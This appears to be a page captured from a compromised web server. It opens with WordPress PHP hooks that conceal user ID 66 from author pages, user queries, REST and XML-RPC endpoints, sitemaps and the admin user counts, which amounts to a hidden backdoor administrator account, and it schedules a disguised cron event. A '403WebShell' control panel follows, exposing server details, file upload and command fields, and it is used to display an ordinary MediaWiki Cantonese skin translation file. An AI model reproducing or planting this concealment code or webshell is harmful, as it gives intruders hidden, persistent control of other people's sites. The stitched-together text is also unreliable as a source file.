add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/skins/Vector/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/skins/Vector/i18n/yue-hant.json
{
	"@metadata": {
		"authors": [
			"Deryck Chan",
			"H78c67c",
			"Hello903hello",
			"Ktchankt",
			"Moon0319",
			"OmniBus",
			"Roy17",
			"Waihorace",
			"Winston Sung",
			"Yueman"
		]
	},
	"skinname-vector": "Vector",
	"vector-skin-desc": "提供2隻Vector外觀:\n* 2011 - MonoBook嘅摩登版,有新嘅樣,又有好多功能改進。\n* 2022 - 由維基媒體基金會[[mw:Desktop Improvements|桌面改善]]計劃搞出嚟嘅Vector版本。",
	"prefs-vector-enable-vector-1-label": "用舊版Vector",
	"prefs-vector-enable-vector-1-help": "來緊幾年,我哋會逐步更新Vector外觀。揀舊版Vector畀你用返Vector嘅舊版本(2019年12月版)。要瞭解更新詳情,請去我哋嘅[[mw:Reading/Web/Desktop_Improvements|計畫專頁]]。",
	"vector-opt-out": "轉返舊貌",
	"vector-opt-out-tooltip": "改你嘅設定用返舊款外觀(舊版Vector)",
	"vector.css": "/* 響呢度放 CSS 碼去改用戶用嘅域達畫面 */",
	"vector.js": "/* 響每一次個頁面載入時,用域達畫面嘅用戶都會載入呢度任何嘅JavaScript */",
	"vector-action-toggle-sidebar": "邊欄開閂",
	"vector-languages": "語言",
	"vector-language-button-aria-label": "去睇另一種語文嘅文章。有{{PLURAL:$1|$1種語言版本}}。",
	"vector-language-button-label": "{{PLURAL:$1|$1種語言}}",
	"vector-no-language-button-label": "加語言",
	"vector-no-language-button-aria-label": "呢篇文淨係喺呢種語言先有。喺第種語言開呢篇文。",
	"vector-language-variant-switcher-label": "改語言變體",
	"vector-action-addsection": "加主題",
	"vector-action-delete": "剷走",
	"vector-action-move": "搬",
	"vector-action-protect": "保護",
	"vector-action-undelete": "取消剷走",
	"vector-action-unprotect": "改保護",
	"vector-view-create": "開",
	"vector-view-edit": "改",
	"vector-view-history": "睇返紀錄",
	"vector-view-view": "閱",
	"vector-view-viewsource": "睇吓原始碼",
	"vector-jumptonavigation": "跳去導覽",
	"vector-jumptosearch": "跳去搵嘢",
	"vector-jumptocontent": "跳去內容",
	"vector-more-actions": "多啲",
	"vector-appearance-label": "閱讀設定",
	"vector-feature-limited-width-name": "欄闊",
	"vector-feature-limited-width-0-label": "闊",
	"vector-feature-limited-width-1-label": "標準",
	"vector-feature-custom-font-size-name": "打字大細",
	"vector-feature-custom-font-size-0-label": "細",
	"vector-feature-custom-font-size-1-label": "標準",
	"vector-feature-custom-font-size-2-label": "大",
	"skin-theme-name": "色彩",
	"skin-theme-day-label": "淺色",
	"skin-theme-night-label": "深色",
	"skin-theme-os-label": "自動",
	"vector-search-loader": "載入緊搜索提議",
	"vector-searchsuggest-containing": "搵包含 <strong class=\"cdx-typeahead-search__search-footer__query\">$1</strong> 嘅版",
	"vector-intro-page": "Help:目錄",
	"vector-toc-label": "目錄",
	"vector-toc-beginning": "文頭",
	"vector-toc-toggle-button-label": "切換去 $1 細章節",
	"vector-anon-user-menu-pages": "未簽到編者用嘅版面",
	"vector-anon-user-menu-pages-learn": "知多啲",
	"vector-anon-user-menu-pages-label": "知多啲有關改嘢",
	"vector-main-menu-tooltip": "主目錄",
	"vector-toc-menu-tooltip": "內容一覽",
	"vector-toc-collapsible-button-label": "開/收內容一覽",
	"vector-site-nav-label": "站點",
	"vector-main-menu-label": "主目錄",
	"vector-page-tools-label": "架撐",
	"vector-page-tools-general-label": "基本",
	"vector-page-tools-actions-label": "動作",
	"vector-pin-element-label": "移去側欄",
	"vector-unpin-element-label": "收埋",
	"vector-2022-prefs-talkpage": "[[mw:Talk:Reading/Web/Desktop_Improvements|傾下]]",
	"tooltip-vector-anon-user-menu-title": "多啲選項",
	"vector-page-tools-nav-label": "頁面工具",
	"vector-prefs-limited-width": "啟用限制闊度模式",
	"vector-prefs-limited-width-help": "啟用限制闊度模式去改善閱讀嘅體驗。",
	"empty-language-selector-body": "頁面內容唔支援其他語言。",
	"vector-toc-unpinned-popup": "頁面目錄搬咗嚟呢度。",
	"vector-page-tools-unpinned-popup": "架撐目錄搬咗嚟呢度。",
	"vector-main-menu-unpinned-popup": "主目錄搬咗嚟呢度。",
	"vector-2022-beta-preview-label": "Vector 2022 beta"
}

Youez - 2016 - github.com/yon3zu
LinuXploit